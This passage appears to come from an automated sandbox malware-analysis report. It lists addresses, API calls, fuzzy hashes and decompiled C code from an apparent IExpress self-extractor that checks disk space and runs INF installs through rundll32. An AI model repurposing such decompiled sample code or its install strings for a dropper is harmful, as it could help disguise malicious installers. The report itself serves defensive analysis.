                                                                                                                                                                                                                                            0x00a41d75
                                                                                                                                                                                                                                            0x00a41d76
                                                                                                                                                                                                                                            0x00a41d78
                                                                                                                                                                                                                                            0x00a41d7f
                                                                                                                                                                                                                                            0x00a41e05
                                                                                                                                                                                                                                            0x00a41e09
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a41e12
                                                                                                                                                                                                                                            0x00a41e1b
                                                                                                                                                                                                                                            0x00a41e73
                                                                                                                                                                                                                                            0x00a41e21
                                                                                                                                                                                                                                            0x00a41e21
                                                                                                                                                                                                                                            0x00a41e28
                                                                                                                                                                                                                                            0x00a41e37
                                                                                                                                                                                                                                            0x00a41e3e
                                                                                                                                                                                                                                            0x00a41e52
                                                                                                                                                                                                                                            0x00a41e60
                                                                                                                                                                                                                                            0x00a41e60
                                                                                                                                                                                                                                            0x00a41e3e
                                                                                                                                                                                                                                            0x00a41e79
                                                                                                                                                                                                                                            0x00a41e7b
                                                                                                                                                                                                                                            0x00a41e84
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a41d9b
                                                                                                                                                                                                                                            0x00a41d9b
                                                                                                                                                                                                                                            0x00a41da0
                                                                                                                                                                                                                                            0x00a41da2
                                                                                                                                                                                                                                            0x00a41da5
                                                                                                                                                                                                                                            0x00a41da5
                                                                                                                                                                                                                                            0x00a41da7
                                                                                                                                                                                                                                            0x00a41da8
                                                                                                                                                                                                                                            0x00a41dac
                                                                                                                                                                                                                                            0x00a41dae
                                                                                                                                                                                                                                            0x00a41db4
                                                                                                                                                                                                                                            0x00a41db7
                                                                                                                                                                                                                                            0x00a41db7
                                                                                                                                                                                                                                            0x00a41db9
                                                                                                                                                                                                                                            0x00a41dba
                                                                                                                                                                                                                                            0x00a41dbe
                                                                                                                                                                                                                                            0x00a41dc3
                                                                                                                                                                                                                                            0x00a41dce
                                                                                                                                                                                                                                            0x00a41dd2
                                                                                                                                                                                                                                            0x00a41deb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a41df0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a41dd2
                                                                                                                                                                                                                                            0x00a41bf7
                                                                                                                                                                                                                                            0x00a41bfe
                                                                                                                                                                                                                                            0x00a41c07
                                                                                                                                                                                                                                            0x00a41d55
                                                                                                                                                                                                                                            0x00a41d5a
                                                                                                                                                                                                                                            0x00a41d5b
                                                                                                                                                                                                                                            0x00a41d5d
                                                                                                                                                                                                                                            0x00a41d5e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a41c1b
                                                                                                                                                                                                                                            0x00a41c1b
                                                                                                                                                                                                                                            0x00a41c20
                                                                                                                                                                                                                                            0x00a41c2c
                                                                                                                                                                                                                                            0x00a41c33
                                                                                                                                                                                                                                            0x00a41c38
                                                                                                                                                                                                                                            0x00a41c3a
                                                                                                                                                                                                                                            0x00a41c3a
                                                                                                                                                                                                                                            0x00a41c40
                                                                                                                                                                                                                                            0x00a41c4b
                                                                                                                                                                                                                                            0x00a41c4b
                                                                                                                                                                                                                                            0x00a41c5d
                                                                                                                                                                                                                                            0x00a41c61
                                                                                                                                                                                                                                            0x00a41dd4
                                                                                                                                                                                                                                            0x00a41dd4
                                                                                                                                                                                                                                            0x00a41dd6
                                                                                                                                                                                                                                            0x00a41ddb
                                                                                                                                                                                                                                            0x00a41ddc
                                                                                                                                                                                                                                            0x00a41dde
                                                                                                                                                                                                                                            0x00a41d64
                                                                                                                                                                                                                                            0x00a41d64
                                                                                                                                                                                                                                            0x00a41d67
                                                                                                                                                                                                                                            0x00a41d6c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a41c67
                                                                                                                                                                                                                                            0x00a41c67
                                                                                                                                                                                                                                            0x00a41c6d
                                                                                                                                                                                                                                            0x00a41c72
                                                                                                                                                                                                                                            0x00a41c74
                                                                                                                                                                                                                                            0x00a41c74
                                                                                                                                                                                                                                            0x00a41c8e
                                                                                                                                                                                                                                            0x00a41c99
                                                                                                                                                                                                                                            0x00a41cc0
                                                                                                                                                                                                                                            0x00a41cf8
                                                                                                                                                                                                                                            0x00a41d07
                                                                                                                                                                                                                                            0x00a41d23
                                                                                                                                                                                                                                            0x00a41d09
                                                                                                                                                                                                                                            0x00a41d14
                                                                                                                                                                                                                                            0x00a41d1b
                                                                                                                                                                                                                                            0x00a41d1b
                                                                                                                                                                                                                                            0x00a41d2b
                                                                                                                                                                                                                                            0x00a41d2d
                                                                                                                                                                                                                                            0x00a41d2d
                                                                                                                                                                                                                                            0x00a41d38
                                                                                                                                                                                                                                            0x00a41d39
                                                                                                                                                                                                                                            0x00a41d46
                                                                                                                                                                                                                                            0x00a41cc2
                                                                                                                                                                                                                                            0x00a41cc2
                                                                                                                                                                                                                                            0x00a41ccc
                                                                                                                                                                                                                                            0x00a41cce
                                                                                                                                                                                                                                            0x00a41cce
                                                                                                                                                                                                                                            0x00a41cdb
                                                                                                                                                                                                                                            0x00a41ce6
                                                                                                                                                                                                                                            0x00a41cee
                                                                                                                                                                                                                                            0x00a41cee
                                                                                                                                                                                                                                            0x00a41e89
                                                                                                                                                                                                                                            0x00a41e91
                                                                                                                                                                                                                                            0x00a41e92
                                                                                                                                                                                                                                            0x00a41e94
                                                                                                                                                                                                                                            0x00a41e97
                                                                                                                                                                                                                                            0x00a41ea4
                                                                                                                                                                                                                                            0x00a41ea4
                                                                                                                                                                                                                                            0x00a41c61
                                                                                                                                                                                                                                            0x00a41c07
                                                                                                                                                                                                                                            0x00a41bd3
                                                                                                                                                                                                                                            0x00a41b7b

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00A41BE7
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00A41BFE
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00A41C57
                                                                                                                                                                                                                                            • GetPrivateProfileIntA.KERNEL32 ref: 00A41C88
                                                                                                                                                                                                                                            • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00A41140,00000000,00000008,?), ref: 00A41CB8
                                                                                                                                                                                                                                            • GetShortPathNameA.KERNEL32 ref: 00A41D1B
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A44518
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A44554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                            • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                            • API String ID: 383838535-3368923722
                                                                                                                                                                                                                                            • Opcode ID: 76a0cb42115743904d667aad99a5f1ce1ce846ffa2793dbaf35844764b97586b
                                                                                                                                                                                                                                            • Instruction ID: 1607f65f36a05243515e118483dfafe0b7786047770689486cf3c2c60701ef0f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76a0cb42115743904d667aad99a5f1ce1ce846ffa2793dbaf35844764b97586b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 92A14CBCA402186BEB20DB28CC45FEA7769EBD6310F1407A9E555A32C1DBB19DC6CB50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 324 a4597d-a459b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 a459dd-a45a1b GetDiskFreeSpaceA 324->325 326 a459bb-a459d8 call a444b9 call a46285 324->326 328 a45ba1-a45bde memset call a46285 GetLastError FormatMessageA 325->328 329 a45a21-a45a4a MulDiv 325->329 341 a45c05-a45c14 call a46ce0 326->341 338 a45be3-a45bfc call a444b9 SetCurrentDirectoryA 328->338 329->328 332 a45a50-a45a6c GetVolumeInformationA 329->332 335 a45ab5-a45aca SetCurrentDirectoryA 332->335 336 a45a6e-a45ab0 memset call a46285 GetLastError FormatMessageA 332->336 340 a45acc-a45ad1 335->340 336->338 353 a45c02 338->353 344 a45ae2-a45ae4 340->344 345 a45ad3-a45ad8 340->345 346 a45ae6 344->346 347 a45ae7-a45af8 344->347 345->344 349 a45ada-a45ae0 345->349 346->347 352 a45af9-a45afb 347->352 349->340 349->344 354 a45b05-a45b08 352->354 355 a45afd-a45b03 352->355 356 a45c04 353->356 357 a45b20-a45b27 354->357 358 a45b0a-a45b1b call a444b9 354->358 355->352 355->354 356->341 360 a45b52-a45b5b 357->360 361 a45b29-a45b33 357->361 358->353 364 a45b62-a45b6d 360->364 361->360 363 a45b35-a45b50 361->363 363->364 365 a45b76-a45b7d 364->365 366 a45b6f-a45b74 364->366 368 a45b83 365->368 369 a45b7f-a45b81 365->369 367 a45b85 366->367 370 a45b96-a45b9f 367->370 371 a45b87-a45b94 call a4268b 367->371 368->367 369->367 370->356 371->356
                                                                                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                                                                                            			E00A4597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				char _v788;
                                                                                                                                                                                                                                            				long _v792;
                                                                                                                                                                                                                                            				long _v796;
                                                                                                                                                                                                                                            				long _v800;
                                                                                                                                                                                                                                            				signed int _v804;
                                                                                                                                                                                                                                            				long _v808;
                                                                                                                                                                                                                                            				int _v812;
                                                                                                                                                                                                                                            				long _v816;
                                                                                                                                                                                                                                            				long _v820;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				signed int _t55;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				int _t69;
                                                                                                                                                                                                                                            				signed int _t73;
                                                                                                                                                                                                                                            				signed short _t78;
                                                                                                                                                                                                                                            				signed int _t87;
                                                                                                                                                                                                                                            				signed int _t101;
                                                                                                                                                                                                                                            				int _t102;
                                                                                                                                                                                                                                            				unsigned int _t103;
                                                                                                                                                                                                                                            				unsigned int _t105;
                                                                                                                                                                                                                                            				signed int _t111;
                                                                                                                                                                                                                                            				long _t112;
                                                                                                                                                                                                                                            				signed int _t116;
                                                                                                                                                                                                                                            				CHAR* _t118;
                                                                                                                                                                                                                                            				signed int _t119;
                                                                                                                                                                                                                                            				signed int _t120;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t114 = __edi;
                                                                                                                                                                                                                                            				_t46 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                                                            				_v804 = __edx;
                                                                                                                                                                                                                                            				_t118 = __ecx;
                                                                                                                                                                                                                                            				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                                                            				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                                                            				if(_t50 != 0) {
                                                                                                                                                                                                                                            					_push(__edi);
                                                                                                                                                                                                                                            					_v796 = 0;
                                                                                                                                                                                                                                            					_v792 = 0;
                                                                                                                                                                                                                                            					_v800 = 0;
                                                                                                                                                                                                                                            					_v808 = 0;
                                                                                                                                                                                                                                            					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                                                            					__eflags = _t55;
                                                                                                                                                                                                                                            					if(_t55 == 0) {
                                                                                                                                                                                                                                            						L29:
                                                                                                                                                                                                                                            						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                            						 *0xa49124 = E00A46285();
                                                                                                                                                                                                                                            						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                            						_t110 = 0x4b0;
                                                                                                                                                                                                                                            						L30:
                                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                                            						E00A444B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                                                            						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                                                            						L31:
                                                                                                                                                                                                                                            						_t66 = 0;
                                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                                            						L32:
                                                                                                                                                                                                                                            						_pop(_t114);
                                                                                                                                                                                                                                            						goto L33;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t69 = _v792 * _v796;
                                                                                                                                                                                                                                            					_v812 = _t69;
                                                                                                                                                                                                                                            					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                                                            					__eflags = _t116;
                                                                                                                                                                                                                                            					if(_t116 == 0) {
                                                                                                                                                                                                                                            						goto L29;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                                                            					__eflags = _t73;
                                                                                                                                                                                                                                            					if(_t73 != 0) {
                                                                                                                                                                                                                                            						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                                                            						_t101 =  &_v16;
                                                                                                                                                                                                                                            						_t111 = 6;
                                                                                                                                                                                                                                            						_t119 = _t118 - _t101;
                                                                                                                                                                                                                                            						__eflags = _t119;
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                                                            							__eflags = _t22;
                                                                                                                                                                                                                                            							if(_t22 == 0) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                                                            							__eflags = _t87;
                                                                                                                                                                                                                                            							if(_t87 == 0) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *_t101 = _t87;
                                                                                                                                                                                                                                            							_t101 = _t101 + 1;
                                                                                                                                                                                                                                            							_t111 = _t111 - 1;
                                                                                                                                                                                                                                            							__eflags = _t111;
                                                                                                                                                                                                                                            							if(_t111 != 0) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t111;
                                                                                                                                                                                                                                            						if(_t111 == 0) {
                                                                                                                                                                                                                                            							_t101 = _t101 - 1;
                                                                                                                                                                                                                                            							__eflags = _t101;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *_t101 = 0;
                                                                                                                                                                                                                                            						_t112 = 0x200;
                                                                                                                                                                                                                                            						_t102 = _v812;
                                                                                                                                                                                                                                            						_t78 = 0;
                                                                                                                                                                                                                                            						_t118 = 8;
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							__eflags = _t102 - _t112;
                                                                                                                                                                                                                                            							if(_t102 == _t112) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t112 = _t112 + _t112;
                                                                                                                                                                                                                                            							_t78 = _t78 + 1;
                                                                                                                                                                                                                                            							__eflags = _t78 - _t118;
                                                                                                                                                                                                                                            							if(_t78 < _t118) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t78 - _t118;
                                                                                                                                                                                                                                            						if(_t78 != _t118) {
                                                                                                                                                                                                                                            							__eflags =  *0xa49a34 & 0x00000008;
                                                                                                                                                                                                                                            							if(( *0xa49a34 & 0x00000008) == 0) {
                                                                                                                                                                                                                                            								L20:
                                                                                                                                                                                                                                            								_t103 =  *0xa49a38; // 0x0
                                                                                                                                                                                                                                            								_t110 =  *((intOrPtr*)(0xa489e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                            								L21:
                                                                                                                                                                                                                                            								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                                                            								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                                                            									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                                                            									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            										__eflags = _t103 - _t116;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										__eflags = _t110 - _t116;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								if(__eflags <= 0) {
                                                                                                                                                                                                                                            									 *0xa49124 = 0;
                                                                                                                                                                                                                                            									_t66 = 1;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t66 = E00A4268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                                                            							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t105 =  *0xa49a38; // 0x0
                                                                                                                                                                                                                                            							_t110 =  *((intOrPtr*)(0xa489e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xa489e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                            							_t103 = (_t105 >> 2) +  *0xa49a38;
                                                                                                                                                                                                                                            							goto L21;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t110 = 0x4c5;
                                                                                                                                                                                                                                            						E00A444B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						goto L31;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                            					 *0xa49124 = E00A46285();
                                                                                                                                                                                                                                            					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                            					_t110 = 0x4f9;
                                                                                                                                                                                                                                            					goto L30;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t110 = 0x4bc;
                                                                                                                                                                                                                                            					E00A444B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					 *0xa49124 = E00A46285();
                                                                                                                                                                                                                                            					_t66 = 0;
                                                                                                                                                                                                                                            					L33:
                                                                                                                                                                                                                                            					return E00A46CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}



































                                                                                                                                                                                                                                            0x00a4597d
                                                                                                                                                                                                                                            0x00a45988
                                                                                                                                                                                                                                            0x00a4598f
                                                                                                                                                                                                                                            0x00a4599a
                                                                                                                                                                                                                                            0x00a459a6
                                                                                                                                                                                                                                            0x00a459a8
                                                                                                                                                                                                                                            0x00a459af
                                                                                                                                                                                                                                            0x00a459b9
                                                                                                                                                                                                                                            0x00a459dd
                                                                                                                                                                                                                                            0x00a459e4
                                                                                                                                                                                                                                            0x00a459f1
                                                                                                                                                                                                                                            0x00a459fe
                                                                                                                                                                                                                                            0x00a45a0b
                                                                                                                                                                                                                                            0x00a45a13
                                                                                                                                                                                                                                            0x00a45a19
                                                                                                                                                                                                                                            0x00a45a1b
                                                                                                                                                                                                                                            0x00a45ba1
                                                                                                                                                                                                                                            0x00a45baf
                                                                                                                                                                                                                                            0x00a45bbd
                                                                                                                                                                                                                                            0x00a45bd8
                                                                                                                                                                                                                                            0x00a45bde
                                                                                                                                                                                                                                            0x00a45be3
                                                                                                                                                                                                                                            0x00a45bec
                                                                                                                                                                                                                                            0x00a45bf0
                                                                                                                                                                                                                                            0x00a45bfc
                                                                                                                                                                                                                                            0x00a45c02
                                                                                                                                                                                                                                            0x00a45c02
                                                                                                                                                                                                                                            0x00a45c02
                                                                                                                                                                                                                                            0x00a45c04
                                                                                                                                                                                                                                            0x00a45c04
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45c04
                                                                                                                                                                                                                                            0x00a45a27
                                                                                                                                                                                                                                            0x00a45a3a
                                                                                                                                                                                                                                            0x00a45a46
                                                                                                                                                                                                                                            0x00a45a48
                                                                                                                                                                                                                                            0x00a45a4a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45a64
                                                                                                                                                                                                                                            0x00a45a6a
                                                                                                                                                                                                                                            0x00a45a6c
                                                                                                                                                                                                                                            0x00a45abc
                                                                                                                                                                                                                                            0x00a45ac2
                                                                                                                                                                                                                                            0x00a45ac9
                                                                                                                                                                                                                                            0x00a45aca
                                                                                                                                                                                                                                            0x00a45aca
                                                                                                                                                                                                                                            0x00a45acc
                                                                                                                                                                                                                                            0x00a45acc
                                                                                                                                                                                                                                            0x00a45acf
                                                                                                                                                                                                                                            0x00a45ad1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45ad3
                                                                                                                                                                                                                                            0x00a45ad6
                                                                                                                                                                                                                                            0x00a45ad8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45ada
                                                                                                                                                                                                                                            0x00a45adc
                                                                                                                                                                                                                                            0x00a45add
                                                                                                                                                                                                                                            0x00a45add
                                                                                                                                                                                                                                            0x00a45ae0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45ae0
                                                                                                                                                                                                                                            0x00a45ae2
                                                                                                                                                                                                                                            0x00a45ae4
                                                                                                                                                                                                                                            0x00a45ae6
                                                                                                                                                                                                                                            0x00a45ae6
                                                                                                                                                                                                                                            0x00a45ae6
                                                                                                                                                                                                                                            0x00a45ae9
                                                                                                                                                                                                                                            0x00a45aeb
                                                                                                                                                                                                                                            0x00a45af0
                                                                                                                                                                                                                                            0x00a45af6
                                                                                                                                                                                                                                            0x00a45af8
                                                                                                                                                                                                                                            0x00a45af9
                                                                                                                                                                                                                                            0x00a45af9
                                                                                                                                                                                                                                            0x00a45afb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45afd
                                                                                                                                                                                                                                            0x00a45aff
                                                                                                                                                                                                                                            0x00a45b00
                                                                                                                                                                                                                                            0x00a45b03
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45b03
                                                                                                                                                                                                                                            0x00a45b05
                                                                                                                                                                                                                                            0x00a45b08
                                                                                                                                                                                                                                            0x00a45b20
                                                                                                                                                                                                                                            0x00a45b27
                                                                                                                                                                                                                                            0x00a45b52
                                                                                                                                                                                                                                            0x00a45b52
                                                                                                                                                                                                                                            0x00a45b5b
                                                                                                                                                                                                                                            0x00a45b62
                                                                                                                                                                                                                                            0x00a45b6b
                                                                                                                                                                                                                                            0x00a45b6d
                                                                                                                                                                                                                                            0x00a45b76
                                                                                                                                                                                                                                            0x00a45b7d
                                                                                                                                                                                                                                            0x00a45b83
                                                                                                                                                                                                                                            0x00a45b7f
                                                                                                                                                                                                                                            0x00a45b7f
                                                                                                                                                                                                                                            0x00a45b7f
                                                                                                                                                                                                                                            0x00a45b6f
                                                                                                                                                                                                                                            0x00a45b72
                                                                                                                                                                                                                                            0x00a45b72
                                                                                                                                                                                                                                            0x00a45b85
                                                                                                                                                                                                                                            0x00a45b98
                                                                                                                                                                                                                                            0x00a45b9e
                                                                                                                                                                                                                                            0x00a45b87
                                                                                                                                                                                                                                            0x00a45b8f
                                                                                                                                                                                                                                            0x00a45b8f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45b85
                                                                                                                                                                                                                                            0x00a45b29
                                                                                                                                                                                                                                            0x00a45b33
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45b35
                                                                                                                                                                                                                                            0x00a45b48
                                                                                                                                                                                                                                            0x00a45b4a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45b4a
                                                                                                                                                                                                                                            0x00a45b0f
                                                                                                                                                                                                                                            0x00a45b16
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45b16
                                                                                                                                                                                                                                            0x00a45a7c
                                                                                                                                                                                                                                            0x00a45a8a
                                                                                                                                                                                                                                            0x00a45aa5
                                                                                                                                                                                                                                            0x00a45aab
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a459bb
                                                                                                                                                                                                                                            0x00a459c0
                                                                                                                                                                                                                                            0x00a459c7
                                                                                                                                                                                                                                            0x00a459d1
                                                                                                                                                                                                                                            0x00a459d6
                                                                                                                                                                                                                                            0x00a45c05
                                                                                                                                                                                                                                            0x00a45c14
                                                                                                                                                                                                                                            0x00a45c14

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A459A8
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(?), ref: 00A459AF
                                                                                                                                                                                                                                            • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00A45A13
                                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,00000400), ref: 00A45A40
                                                                                                                                                                                                                                            • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00A45A64
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A45A7C
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A45A98
                                                                                                                                                                                                                                            • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00A45AA5
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00A45BFC
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A44518
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A44554
                                                                                                                                                                                                                                              • Part of subcall function 00A46285: GetLastError.KERNEL32(00A45BBC), ref: 00A46285
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4237285672-0
